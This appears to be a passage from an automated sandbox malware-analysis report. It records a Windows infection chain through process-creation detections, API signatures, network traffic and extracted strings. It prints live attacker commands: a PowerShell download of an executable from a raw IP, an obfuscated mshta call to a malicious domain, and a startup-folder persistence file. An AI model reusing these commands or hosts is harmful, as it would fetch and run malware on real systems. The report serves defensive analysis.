Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7448, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5336, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ProcessId: 612, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3652, ProcessName: svchost.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ReversingLabs: Detection: 31%
Source: R4qP4YM0QX.lnk, ReversingLabs: Detection: 18%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49920 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2403385362.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403739955.0000022B398B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404327549.0000022B398B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403439100.0000022B398A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406694141.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419180158.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF656D2C7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2B7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D371F4 FindFirstFileW,FindClose,19_2_00007FF656D371F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D372A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF656D372A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2BC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF656D3A874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D36428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF656D36428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2F50 FindFirstFileExW,19_2_00007FF656CF2F50
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B4005
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B494A GetFileAttributesW,FindFirstFileW,FindClose,30_2_003B494A
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BC2FF
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD14 FindFirstFileW,FindClose,30_2_003BCD14
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,30_2_003BCD9F
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF5D8
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF735
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BFA36
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4494A GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,35_2_00B4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD14 FindFirstFileW,FindClose,35_2_00B4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B43CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 20:06:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /New_2025.webp HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /FILEANH HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 104.116.245.121
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3E87C InternetReadFile,19_2_00007FF656D3E87C
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.19.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 00000013.00000002.2359609213.00000278E57B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.HJ8
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000007.00000002.3392600093.0000016D6AE00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2347436380.000001BE1FDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2525830239.00000281C355C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2306595071.000001BE0FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B34E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: content_new.js.13.drString found in binary or memory: https://www.google.com/chrome
Source: 078cbb06-9041-42f1-a283-8417e7784ea4.tmp.14.dr, 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://www.googleapis.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.iheart.com/podcast/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.instagram.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.last.fm/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.messenger.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.office.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.tiktok.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.youtube.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://y.music.163.com/m/
